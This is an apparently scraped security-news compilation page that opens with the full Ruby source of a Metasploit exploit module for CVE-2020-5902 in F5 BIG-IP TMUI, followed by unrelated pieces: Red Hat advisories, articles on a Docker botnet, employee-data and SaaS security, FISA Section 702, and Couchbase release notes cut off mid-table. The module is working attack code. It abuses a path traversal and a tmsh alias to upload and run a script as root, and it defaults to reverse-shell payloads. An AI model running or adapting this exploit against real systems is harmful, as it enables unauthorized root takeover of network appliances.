This Metasploit module exploits a directory traversal in F5's BIG-IP Traffic Management User Interface (TMUI) to upload a shell script and execute it as the Unix root user. Unix shell access is obtained by escaping the restricted Traffic Management Shell (TMSH). The escape may not be reliable, and you may have to run the exploit multiple times. Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2, 15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4. Tested against the VMware OVA release of 14.1.2.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = AverageRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  include Msf::Exploit::Deprecated  moved_from 'exploit/linux/http/f5_bigip_tmui_rce'  def initialize(info = {})    super(      update_info(        info,        'Name' => 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE',        'Description' => %q{          This module exploits a directory traversal in F5's BIG-IP Traffic          Management User Interface (TMUI) to upload a shell script and execute          it as the Unix root user.          Unix shell access is obtained by escaping the restricted Traffic          Management Shell (TMSH). The escape may not be reliable, and you may          have to run the exploit multiple times. Sorry!          Versions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2,          15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced          in 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4.          Tested against the VMware OVA release of 14.1.2.        },        'Author' => [          'Mikhail Klyuchnikov', # Discovery          'wvu' # Analysis and exploit        ],        'References' => [          ['CVE', '2020-5902'],          ['URL', 'https://support.f5.com/csp/article/K52145254'],          ['URL', 'https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/']        ],        'DisclosureDate' => '2020-06-30', # Vendor advisory        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'DefaultOptions' => {                'CMDSTAGER::FLAVOR' => :bourne,                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 1,        'DefaultOptions' => {          'SSL' => true,          'WfsDelay' => 5        },        'Notes' => {          'Stability' => [SERVICE_RESOURCE_LOSS], # May disrupt the service          'Reliability' => [UNRELIABLE_SESSION], # Seems a little finicky          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]        }      )    )    register_options([      Opt::RPORT(443),      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])    register_advanced_options([      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])    ])  end  def check    res = send_request_cgi(      'method' => 'POST',      'uri' => dir_trav('/tmui/locallb/workspace/fileRead.jsp'),      'vars_post' => {        'fileName' => '/etc/f5-release'      }    )    unless res      return CheckCode::Unknown('Target did not respond to check.')    end    unless res.code == 200 && /BIG-IP release (?<version>[\d.]+)/ =~ res.body      return CheckCode::Safe('Target did not respond with BIG-IP version.')    end    # If we got here, the directory traversal was successful    CheckCode::Vulnerable("Target is running BIG-IP #{version}.")  end  def exploit    create_alias    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager(temp: datastore['WritableDir'])    end  ensure    delete_alias if @created_alias  end  def create_alias    print_status('Creating alias list=bash')    res = send_request_cgi(      'method' => 'POST',      'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),      'vars_post' => {        'command' => 'create cli alias private list command bash'      }    )    if res.nil? || (error = parse_error(res))      case error      when /private "list" \(list\) already exists/        print_error('Alias "list" already exists, deleting it')        delete_alias        # Try to create the alias again        return create_alias      when /java\.lang\.NullPointerException/        print_error('Encountered java.lang.NullPointerException, retrying!')        # XXX: Try to create the alias until we're successful        return create_alias      end      fail_with(Failure::UnexpectedReply,                "Failed to create alias list=bash#{error}")    end    @created_alias = true    print_good('Successfully created alias list=bash')  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    upload_script(cmd)    execute_script  end  def upload_script(cmd)    print_status("Uploading #{script_path}")    res = send_request_cgi(      'method' => 'POST',      'uri' => dir_trav('/tmui/locallb/workspace/fileSave.jsp'),      'vars_post' => {        'fileName' => script_path,        'content' => cmd      }    )    if res.nil? || (error = parse_error(res))      fail_with(Failure::UnexpectedReply,                "Failed to upload #{script_path}#{error}")    end    register_file_for_cleanup(script_path)    print_good("Successfully uploaded #{script_path}")  end  def execute_script    print_status("Executing #{script_path}")    res = send_request_cgi({      'method' => 'POST',      'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),      'vars_post' => {        'command' => "list #{script_path}"      }    }, 3.5)    # No response may mean the service is blocking on payload execution    return unless res && (error = parse_error(res))    case error    when /unexpected argument/      print_error('Alias "list" does not exist, attempting to create it again')      create_alias      # Try to execute the script again... smdh      return execute_script    when /java\.lang\.NullPointerException/      print_error('Encountered java.lang.NullPointerException, retrying!')      # XXX: Try to execute the script until we're successful      return execute_script    end    print_error("Failed to execute #{script_path}#{error}")  end  def delete_alias    print_status('Deleting alias list=bash')    res = send_request_cgi(      'method' => 'POST',      'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'),      'vars_post' => {        'command' => 'delete cli alias private list'      }    )    if res.nil? || (error = parse_error(res))      case error      when /user alias \(list admin\) was not found/        print_good('Alias "list" does not exist or was already deleted')        return      when /java\.lang\.NullPointerException/        print_error('Encountered java.lang.NullPointerException, retrying!')        # XXX: Try to delete the alias until we're successful        return delete_alias      end      print_warning("Failed to delete alias list=bash#{error}")      return    end    print_good('Successfully deleted alias list=bash')  end  def parse_error(res)    return unless res    error =      case res.code      when 200        res.get_json_document['error']      when 500        # This is usually a java.lang.NullPointerException stack trace        res.get_html_document.at('//pre')&.text      else        res.body      end    return if error.blank?    ":\n#{error.strip}"  end  def dir_trav(path)    # PoC courtesy of the referenced F5 advisory: <LocationMatch ".*\.\.;.*">    normalize_uri(target_uri.path, '/tmui/login.jsp/..;', path)  end  def script_path    @script_path ||=      normalize_uri(datastore['WritableDir'], rand_text_alphanumeric(8..42))  endend

F5 BIG-IP TMUI Directory Traversal / File Upload / Code Execution

Red Hat Security Advisory 2023-6885-01 - An update for python is now available for Red Hat Enterprise Linux 7. Issues addressed include a bypass vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6885.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python security updateAdvisory ID:        RHSA-2023:6885-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6885Issue date:         2023-11-13Revision:           01CVE Names:          CVE-2023-40217====================================================================Summary: An update for python is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: TLS handshake bypass (CVE-2023-40217)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-40217References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2235789

Red Hat Security Advisory 2023-6885-01

Red Hat Security Advisory 2023-6227-01 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6227.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2023:6227-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6227Issue date:         2023-11-01Revision:           01CVE Names:          CVE-2023-3354====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* QEMU: VNC: improper I/O watch removal in TLS handshake can lead to remote unauthenticated denial of service (CVE-2023-3354)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3354References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-6227-01

Red Hat Security Advisory 2023-6154-01 - Secondary Scheduler Operator for Red Hat OpenShift 1.2.0. Issues addressed include a denial of service vulnerability.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6154.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Secondary Scheduler Operator for Red Hat OpenShift 1.2.0  
Advisory ID:        RHSA-2023:6154-01  
Product:            Openshift Secondary Scheduler Operator  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6154  
Issue date:         2023-11-01  
Revision:           01  
CVE Names:          CVE-2023-39318  
====================================================================

Summary: 

Secondary Scheduler Operator for Red Hat OpenShift 1.2.0

Description:

The Secondary Scheduler Operator for Red Hat OpenShift is an optional  
operator that makes it possible to deploy a secondary scheduler by  
providing a scheduler image. You can run a scheduler with custom  
plugins without applying additional manifests, such as cluster roles  
and deployments.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-39325)

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (CVE-2023-44487)

* golang: html/template:  improper handling of HTML-like comments within script contexts (CVE-2023-39318)

 * golang: html/template: improper handling of special tags within script contexts (CVE-2023-39319)

* golang: crypto/tls: panic when processing post-handshake message on QUIC connections (CVE-2023-39321)

 * golang: crypto/tls: lack of a limit on buffered post-handshake (CVE-2023-39322)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-39318

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-6154-01

By Waqas
While OracleIV is not a supply chain attack, it highlights the ongoing threat of misconfigured Docker Engine API deployments. 
This is a post from HackRead.com Read the original post: OracleIV DDoS Botnet Malware Targets Docker Engine API Instances

The OracleIV botnet malware employs various tactics, with a primary focus on executing DDoS attacks through UDP and SSL-based floods.

Cybersecurity researchers at Cado Security Labs have exposed a novel (Distributed Denial of Service) DDoS botnet malware dubbed OracleIV targeting publicly exposed Docker Engine API instances.

The findings were part of an investigation into a malicious campaign exploiting misconfigurations in Docker containers to deliver Python malware, compiled as an ELF executable.

Lately, Docker Engine APIs have been frequent targets of cybercriminals since the method has gained popularity due to the increasing adoption of microservice-driven architectures. Attackers exploit the unintentional exposure of the Docker Engine API, often scanning for vulnerable instances to deliver payloads with nefarious objectives.

In the case of the new OracleIV DDoS botnet malware, the attackers initiate access with an HTTP POST request to Docker’s API, specifically the /images/create endpoint. This triggers a docker pull command, fetching a specified image from Dockerhub. Once the malicious image is retrieved, a container is launched to carry out the attacker’s objectives.

Cado Security researchers uncovered a live Dockerhub page for an image named “oracleiv_latest” uploaded by the user “robbertignacio328832.” The image, seemingly harmless as a “Mysql image for docker,” included a malicious payload named “oracle.sh,” an ELF executable acting as a DDoS bot agent. Further analysis revealed additional commands to retrieve XMRig and a miner configuration file.

Static analysis of the executable exposed a 64-bit ELF compiled with Cython, confirming the OracleIV malware’s Python code origin. The malware code, succinct yet potent, contains various functions dedicated to different DDoS methods.

“This image was still live at the time of writing and had over 3,000 pulls,” researchers explained in a blog post. Additionally, it seems to be undergoing frequent updates, with the latest modifications pushed just three days prior to the publication of Cado’s blog.

Dockerhub page for oracleiv\_latest (Cado Security)

The bot connects to a Command and Control server (C2), performing basic authentication with a hardcoded password. Cado Security Labs monitored the botnet’s activity, witnessing DDoS attacks on various targets, primarily using UDP and SSL-based floods.

The C2 commands for initiating DDoS attacks follow a specific format, specifying attack type, target IP/domain, attack duration, rate, and target port. The botnet’s capabilities include UDP floods, SSL-based attacks, SYN floods, slowloris-style attacks, and protocol-specific floods targeting the FiveM server and Valve source engine.

While OracleIV is not a **supply chain attack**, it highlights the ongoing threat of misconfigured Docker Engine API deployments. The portability of containerization enables attackers to execute malicious payloads consistently across Docker hosts.

Although Cado Security has reported the malicious user to Docker, users are urged to conduct periodic assessments of pulled images from Dockerhub, emphasizing the need for vigilance against malicious code.

In conclusion, the OracleIV campaign highlights the importance of securing internet-facing services and implementing strong network defences. Users of Docker and similar services are encouraged to regularly review their exposure and take necessary precautions against potential cybersecurity threats.

****_RELATED ARTICLES_****

1.  **SSH Remains Most Targeted Service in Cado’s Cloud Threat Report**
2.  **Change your password: Docker suffers breach; 190k users affected**
3.  **Hackers Exploit Adobe ColdFusion Vulnerabilities to Deploy Malware**
4.  **Cryptomining and Malware Flourish on Misconfigured Kubernetes Clusters**
5.  **ShellTorch Attack Exposes Millions of PyTorch Systems to RCE Vulnerabilities**

OracleIV DDoS Botnet Malware Targets Docker Engine API Instances

By Waqas
Employee data—it contains some of your company’s most sensitive information. Salaries, social security numbers, health records…this stuff is…
This is a post from HackRead.com Read the original post: HiBoB Experts Reveal: Top Cybersecurity Threats for Employee Data

Employee data—it contains some of your company’s most sensitive information. Salaries, social security numbers, health records…this stuff is like gold to cybercriminals. 

While you need access to **employee data** to run your business, keeping it secure is seriously tricky with today’s sophisticated hacking threats. A data breach could wreck your operations and demolish trust with staff. 

So how do you lock down employee data and protect your organization? Well, why not turn to the people who are responsible for holding and protecting hundreds of thousands of employee records across a wide range of industries? As a leading HR platform for over 3,000 companies, HiBob helps organizations manage sensitive employee information each and every day. 

It’s safe to say these folks know employee data security inside and out as they tirelessly work to minimize and eliminate every **HiBob vulnerability** they can find. In this guide, we’ll share HiBob’s recommendations on the biggest threats to watch out for and best practices to boost security. So, whether you’re in HR, IT, or the executive suite, use these tips from employee data pros to secure your systems. Let’s dive in!

****The Rising Threat of Phishing****

_“Phishing and social engineering represent one of the biggest cybersecurity threats to employee data. Hackers are getting extremely sophisticated with personalized phishing emails and social media scams aimed at specific employees. If they can trick one person into giving up their login credentials, it can give access to tons of sensitive company information.”_ – Tamir Ronen, HiBob’s CISO.

Today’s phishing attacks are highly personalized based on reconnaissance of employees on social media. This makes the phishing attempts seem authentic, tricking employees into giving up login credentials or sensitive data.

Once hackers gain an employee’s login information through phishing, they can access company systems and steal troves of confidential employee records, financial data, intellectual property, and more. To protect against phishing threats, try:

*   Ongoing security awareness training to educate employees on phishing identification
*   Multi-factor authentication across all systems to secure accounts
*   Email security tools to detect and block phishing attempts
*   Monitoring for spikes in phishing activity during high-threat periods
*   Keeping antivirus and spam filters up-to-date to catch the latest phishing tactics

With a layered defence strategy, you can develop strong protections against rising phishing risks.

****The Password Problem****

_“Many data breaches happen not because of fancy hacking techniques, but simply employees using weak, reused passwords. Organizations need to implement strong password policies and multi-factor authentication across all systems containing sensitive data.”_ – Tamir Ronen, HiBob’s CISO.

HiBoB points out that weak and reused passwords are behind many data breaches. Employees often use simple passwords across multiple sites, and hackers take advantage of this through credential-stuffing attacks. 

Using usernames and emails from breached databases, hackers can gain system access using compromised passwords. This allows them to steal employee data, implant malware, or hold data hostage for ransom. To improve password hygiene, try:

*   Enforcing strong password policies with complexity requirements
*   Requiring regular password changes to thwart stale credentials
*   Providing a password manager to generate and store strong passwords
*   Enabling multi-factor authentication across sensitive systems
*   Conducting brute force attack monitoring to identify compromised accounts  
    

With proactive password best practices, companies can shut the door on data breaches through poor password hygiene.

****The Remote Work Risks****

_“With the rise of remote and hybrid work environments, more employee data is being accessed and stored outside of corporate firewalls. Without proper encryption, this data can be easily compromised if a device is lost or stolen. Encrypting employee data should be a top priority for data security.”_ – Tamir Ronen, HiBob’s CISO.

More employee data is now accessed remotely and stored on devices outside of corporate networks than ever before. This introduces risks of data exposure if devices are lost, stolen, or otherwise compromised.

Unencrypted data on remote devices can provide access to employee records, emails, system credentials, and other sensitive information. A single compromised device can lead to a disastrous data breach. To reduce remote work risks, try:

*   Enabling hard drive and file encryption on all endpoints to protect data
*   Using a virtual private network (VPN) for secure remote access
*   Restricting data and system access to only what is needed
*   Providing remote security training on safe device usage
*   Implementing robust device wipe capabilities in case devices are lost  
    

With strong encryption, access control, and remote security measures, companies can embrace flexible work while preventing the leakage of sensitive employee data.

****The Overprivileged Account Danger****

_“Not everyone in an organization needs access to employee data like HR records, payroll info, etc. However, overprivileged credentials are a common issue,” warns_ Tamir Ronen, HiBob’s CISO_. “Companies need to implement least privilege access and role-based permissions to limit exposure.”_ – Tamir Ronen, HiBob’s CISO.

HiBoB points out that overprivileged credentials give employees unnecessary access to sensitive systems and data. This creates significant risks of insider threats, whether through intentional misuse or accidental leakage.

Overly permissive access enables employees to view, share, or modify confidential employee information like salaries, health records, and performance data beyond what their role requires. To limit data exposure, try:

*   Conducting access reviews to identify and revoke unnecessary permissions
*   Implementing role-based access controls and least privilege policies
*   Limiting access to strictly need-to-know data per job duties
*   Enabling detailed access audit logging for regular review
*   Cutting off system/data access immediately for employees who leave the company  
    

With strong access governance, companies can significantly reduce risks associated with overentitled employee credentials.

****In Closing****

Protecting employees’ data is getting tougher every day. Between insidious phishing scams, weak passwords being too easily guessed, and sensitive info flying around unencrypted—it’s a real challenge securing all that critical information.

While no single product is foolproof against **today’s cyber threats**, combining aware users, tough tech safeguards, and sound policies can make your company resilient. Layering on different defences strengthens your protections, and guiding employees on security best practices pays off down the road by keeping data—and your company’s reputation—safe. 

****_RELATED ARTICLES_****

1.  **Google Employees Data Stolen After Data Breach**
2.  **Data of Israeli Employees from 29 Logistics Firms Sold Online**
3.  **Killnet Claim They’ve Stolen Employee Data from Lockheed Martin**
4.  **Stolen: Unencrypted drives with data of 29K Facebook employees**
5.  **Private Data of 240,000 DHS Employees Accessed after Data Breach**

HiBoB Experts Reveal: Top Cybersecurity Threats for Employee Data

Effective marketing operations today are driven by the use of Software-as-a-Service (SaaS) applications. Marketing apps such as Salesforce, Hubspot, Outreach, Asana, Monday, and Box empower marketing teams, agencies, freelancers, and subject matter experts to collaborate seamlessly on campaigns and marketing initiatives. 
These apps serve as the digital command centers for marketing

Effective marketing operations today are driven by the use of Software-as-a-Service (SaaS) applications. Marketing apps such as Salesforce, Hubspot, Outreach, Asana, Monday, and Box empower marketing teams, agencies, freelancers, and subject matter experts to collaborate seamlessly on campaigns and marketing initiatives.

These apps serve as the digital command centers for marketing professionals. They house essential go-to-market strategies, and are often connected to live payment systems authorized to spend substantial budgets. Ensuring their security is a complex task, given the multitude of applications, application owners, configurations within each app, users, interconnected apps and more. In this article, we explore the top Marketing SaaS application use cases, from external users and publicly shared links to connected apps and credit cards — and how to ensure the security and integrity of the data stored within them.

**1 . External Users**

Marketing departments frequently grant administrative or high-access permissions to agency and freelance partners who need access to sensitive reports and data in order to perform. However, managing these external users can be a daunting task. It's vital to closely monitor their permissions and trim them down to the minimum necessary level. Additionally, there's often a gap between the time an employee leaves an agency and when the agency notifies the client. During this period, former employees can retain their access.

**2\. Publicly Shared Links**

Collaboration with agencies often requires sharing files, project management boards, and folders with various team members. Using one set of public links for all users is a tantalizing option, as it cuts down on administrative tasks every time a new user is introduced into the project.

However, this approach can inadvertently expose sensitive assets to former agency employees or other unintended recipients, as public links can be used by anyone.

**3\. Connected Credit Cards**

Marketing budgets often involve significant sums of money, and this financial data is highly sensitive. It's not uncommon for external agencies to manage these budgets, and if left unsecured, it could lead to malicious activities like unauthorized data access or the running of negative campaigns. Organizations need to ensure that access configurations are tightly controlled, with Identity Threat Detection & Response (ITDR) mechanisms sending alerts when users exhibit anomalous behavior.

**4\. Highly Sensitive Data**

Marketing departments rely heavily on prospect and customer data, which is stored and analyzed in SaaS databases like Customer Relationship Management (CRM) systems, Marketing Automation Hubs, and Sales Development Representative (SDR) tools.

Protecting this sensitive data is highly important and requires robust access controls, multi-factor authentication (MFA), and constant monitoring of internal user behavior.

Learn more about securing your marketing team's SaaS apps.

**5\. Connected Apps**

Marketing teams utilize a wide array of connected applications to support their daily operations. These range from calendar apps, to video conferencing plugins, design, project management tools and ad optimization apps. Each of these applications requests different levels of permissions to access company data, some of which are quite intrusive. Organizations need visibility to quantify the risk from these applications.

**Securing Marketing Apps with a SaaS Security Posture Management Solution**

SaaS apps hold the key to productive and efficient work. Any potential data leak or breach is not only a problem for the organization at large, but especially for the Marketing department, who retains the ultimate responsibility for ensuring the brand. Any reputational damage, especially if caused by a MarTech solution, would bring severe impact.

SaaS Security Posture Management (SSPM) platforms enable security teams to work collaboratively with Marketing and ensure the security of these applications. SSPMs monitor and manage internal and external users, ensure tight access controls across the SaaS stack, and safeguard sensitive data. The right SSPM solution will ensure that no operational workflows are disrupted and that all marketing stakeholders remain efficient and productive.

Get a live demo to learn how to secure your entire SaaS stack

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Top 5 Marketing Tech SaaS Security Challenges 

Top senate officials are planning to save the Section 702 surveillance program by attaching it to a must-pass piece of legislation. Critics worry a chance to pass privacy reforms will be missed.

Leaders in the United States Senate have been discussing plans to extend Section 702 of the Foreign Intelligence Surveillance Act (FISA) beyond its December 31 deadline by amending must-pass legislation this month.

A senior congressional aide tells WIRED that leadership offices and judiciary sources have both disclosed that discussions are underway about saving the Section 702 program in the short term by attaching an amendment extending it to a bill that is sorely needed to extend federal funding and avert a government shutdown one week from now.

The program, last extended in 2018, is due to expire at the end of the year. Without a vote to reauthorize 702, the US government will lose its ability to obtain year-long “certifications” compelling telecommunications companies to wiretap overseas calls, text messages, and emails without being served individual warrants or subpoenas.

Whether the authority is reauthorized before expiring on January 1 or not, the actual surveillance is likely to continue into the spring, when this year’s certifications expire.

Extending the program by attaching it to another bill that Congress can’t avoid is a risky political maneuver that will cause significant unrest among a majority of House lawmakers and a number of senators who are working to reform the 702 program. A top priority for privacy hawks is curtailing the ability of federal law enforcement to use 702 data “incidentally” collected on Americans. The 702 program collects communications from two sources: internet service providers and the companies that conduct traffic between them. The latter source is tapped less frequently but intercepts a greater quantity of domestic communications.

An aide to Jim Jordan, the Republican chair of the House Judiciary Committee, said Jordan was firmly on the side of the reformers and would not support extending 702 through a temporary measure. Chuck Schumer, the senate majority leader, did not respond to a request for comment Thursday afternoon.

“America’s security and its citizens’ rights demand more than a short-term fix. Congress has had all year to scrutinize and address this crucial policy question,” says James Czerniawski, a senior policy analyst at the nonprofit Americans for Prosperity. “Doing a short-term extension punts the ball on the critical reforms desperately needed to this program to protect Americans civil liberties.”

While surveillance of US calls is illegal and unconstitutional without a warrant based on probable cause, the government is permitted to collect domestic calls for specific national security purposes under procedures created to minimize its access to them later. The US National Security Agency, which conducts electronic surveillance for the Pentagon, is only permitted to eavesdrop on foreigners who are overseas. Those foreigners, however, many of whom are likely government officials and not criminals or terrorists, frequently exchange calls and emails with people inside the United States, and those get collected as well.

Roughly a quarter of a million people are targeted by the program each year, and it is estimated that the number of individual messages collected reaches into the hundreds of millions.

While the NSA is not allowed to target the communications of “US persons” (an umbrella term for US citizens, legal residents, and corporations), the government has long been permitted to query the database for information on US persons without obtaining warrants.

It is known that the 702 program collects significant numbers of US communications, but the exact quantity is unknown, even to the government. The NSA argues that it would be unfeasible to count the number of Americans incidentally spied on without analyzing the collection thoroughly, further imperiling people’s rights. Privacy watchdogs who have classified knowledge of the program say the term “incidental” is deceiving, in that it makes the volume of the collection sound small.

The term is also frequently conflated with wiretaps that accidentally target Americans, which is called “inadvertent” collection. Incidental collection is factored into the program as an acceptable risk to Americans’ civil liberties, ameliorated by various internal procedures approved by the Justice Department and the Office of the Director of National Intelligence. Critics of the program say these procedures are frequently violated and do little to nothing to stop the FBI from warrantlessly accessing Americans’ calls and emails without evidence that they’ve committed a crime.

Congressional offices striving for a reform—introduced this week in the form of a bipartisan, bicameral bill known as the Government Surveillance Reform Act (GSRA)—say the White House has lobbied Congress for a “clean” reauthorization. Renewing the 702 program for another four to five years without additional privacy safeguards is in line with the intelligence community’s own desires.

The same sources say other bills may also be in the works and could drop by December, excluding many of the additional protections offered by the GSRA. The bill, which has significant support in the House, bans warrantless FBI searches of 702 data but also curtails the use of commercial data available to the government—a known loophole for evading warrant requirements available to law enforcement and intelligence agencies at virtually all levels of government. Many Republicans favor the bill because it would strip security clearances from federal employees caught abusing their access to the database.

Cynthia Choi, cofounder of the nonprofit Stop AAPI Hate, which tracks incidents of discrimination against Asian Americans and Pacific Islanders, said the GSRA would prove particularly crucial in the fight for privacy of immigrant communities. “It is disappointing to learn that Majority Leader Schumer and other congressional leaders are reportedly considering depriving us of this critical opportunity to stop the unjust warrantless surveillance of our family and friends,” she says. “They are well aware that we have experienced decades of wrongful targeting, and they should be fighting alongside us to ensure these issues are addressed as soon as possible.”

Senate Leaders Plan to Prolong NSA Surveillance Using a Must-Pass Bill

Couchbase Server 7.1.4 before 7.1.5 and 7.2.0 before 7.2.1 allows Directory Traversal.

Couchbase Server 7.2.1 was released in September 2023.

**New Features**

This release includes the following new features.

**XDCR**

The following XDCR features are new:

*   XDCR replications, specified by means of the REST API, can now use the filterBinary flag. This specifies whether binary documents should be replicated. Detailed information on the filterBinary flag is provided on the REST reference page, Creating a Replication.
    
*   Using the REST API, node-connectivity can now be checked, prior to the creation of an XDCR reference. See Checking Connections.
    
*   In Couchbase Server Version 7.2.1 and later, XDCR provides enhanced information on cluster-rebalance status. See Rebalance Information
    

**Enhancements**

This release includes the following enhancements:

*   Bloom filters for the Indexing Service were not previously enabled by default. Bloom filters are now enabled by default. This change reduces the Index Service disk lookups when there are insert heavy workloads. Bloom filters are used by the index storage layer to reduce the disk i/o and improve the overall efficiency of the index service. You can disable bloom filters and opt out.
    

**Future Reserved Words**

To give you enough time to prepare ahead, we are going to add the following reserved words for features in an upcoming Couchbase Server release:

*   SEQUENCE
    
*   CACHE
    
*   RESTART
    
*   MAXVALUE
    
*   MINVALUE
    
*   NEXT
    
*   PREV
    
*   PREVIOUS
    
*   NEXTVAL
    
*   PREVVAL
    
*   CYCLE
    
*   RECURSIVE
    
*   RESTRICT
    

No action is required for upgrading to Server 7.2.1.

**New Supported Platforms**

This release adds support for the following new platforms:

*   Alma Linux 9
    
*   Rocky Linux 9
    

**Fixed Issues**

This release contains the following fixes.

**Analytics Service**

  

Issue

Description

Resolution

MB-56957

External collections could not be created using Azure Managed Identity.

Azure dependencies have been updated to correct this issue.

MB-57588

Query results could be unnecessarily converted twice to JSON when documents were large.

The Query result is now converted to JSON once for all documents.

MB-57615

When the Prometheus stats returned from Analytics exceeded four kilobytes, the status code was inadvertently set to 500 (Internal Error), and this resulted in a large number of warnings in the Analytics warning log. Couchbase Server discarded these statistics.

This has been fixed to properly return a 200 (OK) status code when the size of Prometheus stats exceeds 4KiB, allowing these stats to be recorded properly. The warning is not displayed.

**Data Service**

  

Issue

Description

Resolution

MB-39344

The last item in a replica checkpoint was not expelled. In scenarios such as large average item size, high numbers of replicas or low Bucket quota could result in a data-node entering an unrecoverable Out-of-Memory state.

ItemExpel has been enhanced to release all the items in a checkpoint when memory conditions allow.

MB-56084

A rollback loop affected legacy clients when collections were used and a tombstone newer than the last mutation in the default collection was purged.

The lastReadSeqno is now Incremented when the client is not collection-aware.

MB-56644

In rare cases, after a failover or memcached restart, a replica rollback while under memory pressure might have caused a crash in the Data Service.

Memory pressure recovery logic (Item expelling) is now skipped when replica rollback is in progress.

MB-56970

XDCR or restore from backup entered an endless loop if attempting to overwrite a document which was deleted or expired some time ago with a deleteWithMeta operation. This was due to a specific unanticipated state in memory which increased CPU usage, and connection became unusable for further operations.

deleteWithMeta is now resilient to temporary non-existent values with xattr datatype.

MB-57002

